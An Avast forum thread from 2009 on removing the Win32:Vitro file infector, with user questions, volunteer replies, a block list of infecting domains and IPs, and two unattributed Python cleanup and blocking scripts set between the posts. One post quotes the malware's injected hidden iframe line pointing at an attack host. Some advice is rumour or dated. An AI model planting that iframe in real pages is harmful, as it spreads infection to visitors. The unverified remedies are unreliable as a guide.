Author Topic: Malware name Win32:Vitro  (Read 340194 times)

orangbego

  • Guest
Re: Malware name Win32:Vitro
« Reply #270 on: May 26, 2009, 08:31:20 AM »
@all : if Dr. Web Live and AVIRA Live Rescue CD got some errors, just try another Antivirus Rescue CD, recommended is AVAST Live CD.

Antiweapon

  • Guest
Re: Malware name Win32:Vitro
« Reply #271 on: May 29, 2009, 08:53:45 AM »
Hey all, I recently got attacked by this ass of a virus.
I decided to just take the easy way out and reformat, but I want to backup some things before I do.
I was wondering, if I was in safe mode when I did the backups to an external hard drive, would it get infected? I wouldn't be backing up any exes, just music and files; the hard drive in question hasn't been plugged into the infected computer for a while, so I'm almost positive it's not infected, but it does have a few exes on there. Is there any chance they would get infected if I plugged it in during safe mode?

Offline Omid Farhang

  • Frontend Developer
  • Avast Evangelist
  • Super Poster
  • Posts: 1660
  • I wish I could write longer personal text!!
Re: Malware name Win32:Vitro
« Reply #272 on: May 29, 2009, 09:41:00 AM »
Hey all, I recently got attacked by this ass of a virus.
I decided to just take the easy way out and reformat, but I want to backup some things before I do.
I was wondering, if I was in safe mode when I did the backups to an external hard drive, would it get infected? I wouldn't be backing up any exes, just music and files; the hard drive in question hasn't been plugged into the infected computer for a while, so I'm almost positive it's not infected, but it does have a few exes on there. Is there any chance they would get infected if I plugged it in during safe mode?

Back up your files to an external drive (no .exe or .dll files).

Reformat the hard drive.

Do a clean install of Windows.

Scan your external hard drive using an updated antivirus before restoring your backup files :)
Twitter: OmidFarhangEn - OS: Manjaro KDE

Drakkar

  • Guest
Re: Malware name Win32:Vitro
« Reply #273 on: May 30, 2009, 10:51:32 PM »
Hey all, I recently got attacked by this ass of a virus.
I decided to just take the easy way out and reformat, but I want to backup some things before I do.
I was wondering, if I was in safe mode when I did the backups to an external hard drive, would it get infected? I wouldn't be backing up any exes, just music and files; the hard drive in question hasn't been plugged into the infected computer for a while, so I'm almost positive it's not infected, but it does have a few exes on there. Is there any chance they would get infected if I plugged it in during safe mode?


Yes, that darn virus infects Windows processes, which are run even in safe mode.
What you can do is back up using an MS-DOS diskette if you want to try; the virus won't ever run while in MS-DOS.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • Posts: 33891
  • malware fighter
Re: Malware name Win32:Vitro
« Reply #274 on: May 30, 2009, 10:55:40 PM »
Hi Drakkar,

Just a good tip from the past you offered there, but there are loads of modern computers that have no floppy drive (or diskette drive, as it was called by Microsoft) anymore. Also, the file infector is not active in SafeMode,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Spikedbeast

  • Guest
Re: Malware name Win32:Vitro
« Reply #275 on: May 31, 2009, 07:36:58 PM »
OneRing2Rule ...

I'm sorry... I'm battling with Vitro too and I have to warn you... Vitro infects HTML files.
I've found it in many HTML help files, and it is in every driver of the computer I'm fixing.

I did a backup of all the music and files, but when I copy them Vitro appears and I have to start the nuke again...
This one is hard...

ekay417

  • Guest
Re: Malware name Win32:Vitro
« Reply #276 on: June 04, 2009, 02:07:33 AM »
Hi,

I had some general questions about backing up my data among others.

First, here's some background info on how my computer got infected (sorry for the length):

Back in April, my desktop got heavily infected. It was running Windows XP Home Edition SP3. After doing a scan with McAfee (which came with my ISP) at the time, it moved several files, including many important files from the WINDOWS folder. After I rebooted my computer, I was subsequently locked out, as I found out that I had a "login loop error" if I recall correctly. I was able to log back in after following a helpful guide on the Internet and running some bootable software.

The guide then suggested running various software in Safe Mode such as Avast!, Spybot, and other programs. I burned these programs onto a CD using my spare laptop. I was able to install some of the programs successfully, while with others I ran into several roadblocks. I ran a boot-time scan with Avast!, and afterwards it found several infected files but none due to Vitro at the time. Then I ran a full thorough scan of my computer in Safe Mode, and it again found several infected files but none due to Vitro.

There were also other problems in Safe Mode. I found that a lot of .exe’s were missing and all my Microsoft Office Applications wouldn’t work along with notepad. Also, anytime I tried to right click on a file, my screen would flash and close any windows that I had open. Then, it would ask if I wanted to continue in Safe Mode indicating that System Restore wouldn’t be available if I did continue in Safe Mode, and I would always press OK to continue in Safe Mode again.

After discussing the problems I had with the creator of the guide, he said the computer seemed to be heavily infected and suggested reinstalling Windows from scratch. But he suggested doing a repair installation as a long shot before reinstalling Windows from scratch. I used a Dell OS Reinstallation XP Home Edition SP1 CD to run the repair installation, and I ran into several errors because it couldn't find certain files. But somehow I was able to complete a repair installation. Entering Safe Mode after the repair installation, I could now open my Microsoft Office applications, but I couldn't right-click on files without my screen flashing and then proceeding to close all open windows. I then proceeded to open Avast!, and after finding something wrong with my operating memory, it scheduled a boot-time scan. It was during the boot-time scan that the Vitro virus was detected. It said C:\WINDOWS\SYSTEM32\sdbinst.exe was infected by Win32:Vitro, and I had no other option but to delete it.

At this point, I've come to the realization that the best option is to do a fresh installation of Windows, but I want to back up all my Microsoft Office files such as .doc, .xls, .ppt and media such as pictures, mp3s, and video files including .wmv, .mpeg, and .flv. I don't particularly need any of the .exe files. In terms of importance, I need the Microsoft Office files above everything else. All of these files could fit onto a CD, but I can't access my burning software because it's missing. I don't have a flash drive or external hard drive, but I was planning on buying an external hard drive to try to back up all of my files.

The questions I had concerning my situation after reading previous posts on this thread were the following (sorry if I'm repeating the same questions, but I wanted to make sure I got the correct answers for my situation; and sorry if these questions sound dumb, I'm not too advanced when it comes to computers):

If I transferred applications such as Avast!, Spybot, and other software over to my infected computer using a CD, would this infect the CD? Would it infect the transferred software?

Is it safe to continue to operate in Safe Mode?

If I’ve continuously rebooted over and over in Safe Mode for a period of 2 weeks within the last 2 months but never in Normal Mode, will it make my computer any worse than what it is now? I’ve disconnected the infected computer from my home network, never went in Normal Mode, or connected to the Internet since this problem has occurred.

Is it safe to run applications and open files in Safe Mode? Will the Vitro virus infect any additional applications and files in Safe Mode?

I read in previous posts how the virus infects .htm/.html files, will it be safe to even attempt to open these in Safe Mode? The reason I ask is if possible, I would like to retain some of the information in these files such as certain logs by copying the text into a word file.

I read how the virus goes after certain media files such as .mp3 and .wmv, will it be safe to backup these files? Also, does the virus go after .flv files?

Can I backup files to an external hard drive in Safe Mode? I read how flash drives can become infected, can the virus spread to the external hard drive?

If backing up files to an external hard drive in Safe Mode is possible, will Vitro appear when copying these files?

Also, why wasn't Vitro detected when I first ran the scans with Avast! before the repair installation? It wasn't detected until after the repair installation during the boot-time scan.
« Last Edit: June 04, 2009, 02:13:08 AM by ekay417 »

mat05e

  • Guest
Re: Malware name Win32:Vitro
« Reply #277 on: June 06, 2009, 08:15:59 PM »
So I had the same problems as you, and I was beginning to get frustrated because none of the advice on these boards was working. I did a little research and found that, as someone previously stated, this virus comes from Ukraine. After some research, I found an antivirus from Ukraine that seems to fix the problem called True Sword 4. It is a free download and gives you 10 free solutions to the problem...

Unfortunately, this trojan, as you probably know by now, infects more than 10 parts of your system... but maybe it will free up enough of the worm that it is coupled with (called the convoker worm, sp?) to allow you to execute some other antivirus software.

Gortwiz

  • Guest
Re: Malware name Win32:Vitro
« Reply #278 on: June 07, 2009, 11:12:27 PM »
Hello everyone! This is my first post here. I have been reading this thread and I am in the same boat as many others here. I was hit with virut/vitro about 2 months ago on my Vista desktop. I thought I got rid of it (repaired with the DrWeb Live CD). I ran everything (except Avast) including AVG 8.5, SuperAntiSpyware, Spybot S&D, AdAware, DrWeb CureIt, Windows Defender and Malwarebytes, all error free offline. I then ran (still offline) many games and other apps with no apparent problems for a week or two, scanning every night for virus/malware. Then, being fairly confident it was gone, I went back online and updated Vista and the others with the latest signatures, went offline and ran everything again without any errors. I then started using Vista online again for about a month with no problems, again running full scans several times a week. I thought I had defeated this dreaded beast!

About 2 weeks ago I was going to install a new game (Burnout Paradise) so I updated everything including AVG 8.5. I also remember getting a popup about updating Java which I accepted (in retrospect it may have been bogus), and updated Firefox to the latest version as well. Then I went offline and ran a full scan with AVG 8.5 and KaBoom! It found thousands of HTML/Framer viruses (same as Avast's HTML:Iframe-inf). Almost every htm, html and asp file on my machine was infected, BUT there were NO other virus/malware found. I even got the latest DrWeb Live CD and it ran error free. I thought the HTML/Framer that AVG found might be a false positive, but upon some research I found that

"<iframe src="hxxp://jL.chura.pl/rc/" style="display:none"></iframe>"

was at the bottom of the infected files. I then downloaded Avast (from this XP machine), put it on Vista and ran a full scan. It did NOT detect the iframe but did find 5 exes that had Win32:Vitro. I put them in quarantine, then shut down AVG 8.5, ran Avast again, and this time it found the 6 thousand HTML:Iframe-inf. So apparently AVG 8.5 somehow stops Avast from finding this. Most importantly, Avast did find and remove the 5 Win32:Vitro that NO other anti-virus/malware tool could detect. Based on this, I will be dumping AVG and installing Avast whether I fix this problem or not.

To fix the iframe problem I tried the freeware htm auto_replace tool that was mentioned in this forum. I was able to fix all of my D: drive, and most of the C: drive, so this utility is great. The only problem is that there are several folders on the C: drive that can't be changed. This is where I need help from someone with more knowledge than I have about Vista. I ran this utility under the real administrator and it reports that the files are changed, but if I check again, nothing has been changed. Here is one of the file paths:

C:\User\don\AppData\Local\VirtualStore\ProgramFiles\Adobe\Reader8.0\Reader\Howto\Enu\ (hundreds of html's)

There are a few others under VirtualStore\ProgramFiles\ that can't be changed as well. I also tried running in Safe Mode, but same problem.

I am hoping that with all the knowledge on this forum someone can help or at least point me in the right direction. I can go to these locations, rename the html to txt and open them with Notepad, make changes, but when trying to save I get some message about not being able to change this file. Looking at the file attributes, it is not read-only, so I am at a loss here. I also turned off UAC but no difference. How can this virus get in here and I can't?

Sorry for the length here.  I know that I may not beat this thing, but since I can still use XP for the net, I can spend a few weeks trying to fix the Vista machine.

One final question...  IF I get all of the iframes fixed, and IF Avast and everything else runs without errors, is there anything else I should do before running Vista online?

This virut/vitro really sucks!  I read about a few here who have said they beat it.  I would like anyone who really has to reaffirm this.  Also anyone who really thought they got rid of it (like me a few months ago) and got nailed again, please post and let us know that as well.

Many thanks to everyone on this forum!
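The cleanup the post above describes by hand (finding the appended hidden iframe in every htm/html/asp file and stripping it) can be scripted. The block below is an added example, not the htm auto_replace tool or any code from this thread: it removes only iframes whose src host is on a block list, so legitimate frames in the same files survive, and it walks a directory tree in dry-run mode first so the list of affected files can be reviewed before anything is written. The host names are the ones quoted in this thread; the file extensions and the sample pages built in demo() are constructed for the example.

```python
"""Injected-iframe cleaner: an added example, not the 'htm auto_replace'
tool or any code from this thread. It removes <iframe> elements whose src
points at a host on a block list, leaves all other frames alone, and can
walk a directory tree in dry-run mode first. The host list is taken from
the names quoted in the thread; file extensions and the sample files in
demo() are constructed for the example."""
import os
import re
import tempfile
from urllib.parse import urlparse

# Hosts quoted in the thread (assumption: extend with whatever your own
# scan turns up). Matching is on the exact host name, lower-cased.
BAD_HOSTS = {"jl.chura.pl", "jl.chura.nl", "jl.chupa.nl", "zief.pl", "ntkmpla.info"}

# Extensions the posts above report as infected, plus the usual server-side ones.
EXTENSIONS = {".htm", ".html", ".asp", ".aspx", ".php"}

# One <iframe ...> start tag with an optional closing tag. re.S lets the
# attribute list span lines; [^>]* stops at the first '>'.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>(?:\s*</iframe>)?", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def src_host(tag: str) -> str:
    """Host name of the iframe's src attribute, or '' if it has none."""
    m = SRC_RE.search(tag)
    if not m:
        return ""
    # Accept the defanged 'hxxp' spelling used in the thread as well as real URLs.
    url = re.sub(r"^hxxp", "http", m.group(1), flags=re.I)
    return (urlparse(url).hostname or "").lower()


def strip_injected_iframes(html: str, bad_hosts=BAD_HOSTS):
    """Return (cleaned_html, removed_count); only frames on bad_hosts are cut."""
    removed = 0

    def repl(m):
        nonlocal removed
        if src_host(m.group(0)) in bad_hosts:
            removed += 1
            return ""
        return m.group(0)

    return IFRAME_RE.sub(repl, html), removed


def clean_tree(root, bad_hosts=BAD_HOSTS, dry_run=True):
    """Map path -> removed_count for every file under root that had a hit.
    With dry_run=True nothing is written, so review the list before rerunning
    with dry_run=False. Bytes that are not valid UTF-8 round-trip unchanged
    via surrogateescape."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() not in EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                text = f.read().decode("utf-8", errors="surrogateescape")
            cleaned, n = strip_injected_iframes(text, bad_hosts)
            if n:
                hits[path] = n
                if not dry_run:
                    with open(path, "wb") as f:
                        f.write(cleaned.encode("utf-8", errors="surrogateescape"))
    return hits


def demo():
    """Build a constructed tree with one infected and one clean page, run a
    dry run, then a real clean, and return the hit counts from each pass."""
    root = tempfile.mkdtemp()
    infected = os.path.join(root, "help.htm")
    clean = os.path.join(root, "index.html")
    injected = '<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>'
    with open(infected, "w", encoding="utf-8") as f:
        f.write("<html><body>Help text</body></html>\n" + injected)
    with open(clean, "w", encoding="utf-8") as f:
        f.write('<html><body><iframe src="https://example.org/map"></iframe></body></html>')
    first = clean_tree(root)                  # dry run: reports, writes nothing
    second = clean_tree(root, dry_run=False)  # writes the cleaned file
    third = clean_tree(root)                  # nothing left to report
    return len(first), len(second), len(third)


if __name__ == "__main__":
    print(demo())  # (1, 1, 0)
```

Run it with dry_run=True first and check that the reported paths are only the files you expect; for a tree like the VirtualStore one above, run it from an elevated prompt, since a non-elevated process on Vista is redirected to the per-user VirtualStore copy rather than the file under Program Files.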

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • Posts: 33891
  • malware fighter
Re: Malware name Win32:Vitro
« Reply #279 on: June 08, 2009, 12:11:53 AM »
Howdy Gortwiz,

Yes, this is a monster of a thing to combat. Apparently you were re-infected online via the Vitro-infecting site. These have to be blocked absolutely, with SpywareBlaster, where you can specify these separately, or via the use of a hosts file.
Block these IP addresses:
61,235,117,80     (ntkmpla dot info)
221,5,74,38     (zief dot pl)
212,85,96,95     (jL dot chupa dot nl)
218,93,205,30     (jL dot chura dot nl)
(Replace the commas with dots)
Any contact with this buggy file infector via peripherals, data, back-ups, network, online sources, cache etc. etc. will lead to a re-infect that, when not in SafeMode, will go through your OS like a bush fire and will try to infect everything, and it succeeds with some completely, some are randomly spared, some partly; that is why it is so difficult to repair from an infection.
So effectively it is either block the file infector or throw in the towel: fdisk, re-format, re-install.
There is a rumor that there is a Ukrainian repair tool, because the file infector was apparently malcreated there, but whether this is only a rumor I do not know. Thanks for reporting here and for the further information gained on this nastiness,

polonus
« Last Edit: June 08, 2009, 12:18:00 AM by polonus »

YoKenny

  • Guest
Re: Malware name Win32:Vitro
« Reply #280 on: June 08, 2009, 02:46:33 AM »
These have to be blocked absolutely with SpywareBlaster

How can SpywareBlaster block IP addresses or URLs, as it uses CLSIDs for blocking?

I have requested that the URLs be added to hpHosts file though.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • Posts: 88897
  • No support PMs thanks
Re: Malware name Win32:Vitro
« Reply #281 on: June 08, 2009, 03:43:10 AM »
It also adds URLs to the Restricted Sites (IE only) area, that's how ;D
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

YoKenny

  • Guest
Re: Malware name Win32:Vitro
« Reply #282 on: June 08, 2009, 03:57:00 AM »
It also adds URLs to the Restricted Sites (IE only) area, that's how ;D

How do you add the URLs to the Restricted Sites (IE only) area?

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • Posts: 88897
  • No support PMs thanks
Re: Malware name Win32:Vitro
« Reply #283 on: June 08, 2009, 04:07:05 PM »
It is done automatically by the updates, so if the URLs are in the update then they would be blocked.
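The two blocking mechanisms discussed in the replies above (a hosts file entry, and SpywareBlaster's placing of domains in Internet Explorer's Restricted Sites zone) both come down to a small text artefact. The block below is an added example, not SpywareBlaster's or Avast's code: from the domain names quoted in this thread it emits a hosts-file fragment and a .reg file that writes the ZoneMap entries, and it can check an existing hosts file for names that are still missing, which is the kind of verification YoKenny did with ZonedOut. Assumptions: the registrable part of each name is its last two labels, and zone number 4 is Restricted Sites.

```python
"""Block-list emitters: an added example, not SpywareBlaster's or Avast's
code. Produces a hosts-file fragment and a .reg file that puts domains into
Internet Explorer's Restricted Sites zone via the ZoneMap registry layout,
and checks an existing hosts file for names still missing. Assumptions:
the registrable domain is the last two labels, and zone 4 is Restricted Sites."""
ZONE_RESTRICTED = 4
ZONEMAP = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
           r"\Internet Settings\ZoneMap\Domains")

# Names quoted in the thread: polonus's list plus the host Gortwiz saw in the iframe.
THREAD_DOMAINS = ["ntkmpla.info", "zief.pl", "jL.chupa.nl", "jL.chura.nl", "jL.chura.pl"]


def hosts_entries(domains):
    """hosts-file lines mapping each name to 0.0.0.0, so a blocked request
    fails fast instead of hitting whatever listens on loopback."""
    return "".join(f"0.0.0.0 {d.lower()}\n" for d in sorted(set(domains), key=str.lower))


def missing_from_hosts(hosts_text, domains):
    """Names from domains that no non-comment line of hosts_text maps to a
    null or loopback address; use it to confirm an update really landed."""
    blocked = set()
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop trailing comments
        parts = line.split()
        if len(parts) >= 2 and parts[0] in ("0.0.0.0", "127.0.0.1", "::1"):
            blocked.update(p.lower() for p in parts[1:])
    return sorted(d.lower() for d in domains if d.lower() not in blocked)


def zonemap_key(fqdn):
    """ZoneMap stores sub.example.com as Domains\\example.com\\sub and a bare
    example.com as Domains\\example.com (two-label registrable domain assumed)."""
    labels = fqdn.lower().split(".")
    base = ".".join(labels[-2:])
    sub = ".".join(labels[:-2])
    return f"{ZONEMAP}\\{base}" + (f"\\{sub}" if sub else "")


def restricted_sites_reg(domains, schemes=("http", "https")):
    """Text of a .reg file. Under each domain key, a value named after the
    scheme holds the zone number: "http"=dword:00000004 is Restricted Sites."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for d in sorted(set(domains), key=str.lower):
        lines.append(f"[{zonemap_key(d)}]")
        lines.extend(f'"{s}"=dword:{ZONE_RESTRICTED:08x}' for s in schemes)
        lines.append("")
    return "\r\n".join(lines)


if __name__ == "__main__":
    print(hosts_entries(THREAD_DOMAINS))
    print(restricted_sites_reg(THREAD_DOMAINS))
    print(missing_from_hosts("127.0.0.1 localhost\n", THREAD_DOMAINS))
```

The .reg output is per-user (HKEY_CURRENT_USER), which matches what an unprivileged SpywareBlaster update touches; the hosts file applies to every process on the machine but, as the thread notes, only to name lookups, so a hard-coded IP in an injected frame still needs a firewall rule.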

YoKenny

  • Guest
Re: Malware name Win32:Vitro
« Reply #284 on: June 08, 2009, 09:31:27 PM »
It is done automatically by the updates, so if the urls are in the update then they would be blocked.
They are not there according to ZonedOut, and I have the latest SpywareBlaster updates installed:
http://www.funkytoad.com/index.php?option=com_content&view=article&id=15&Itemid=33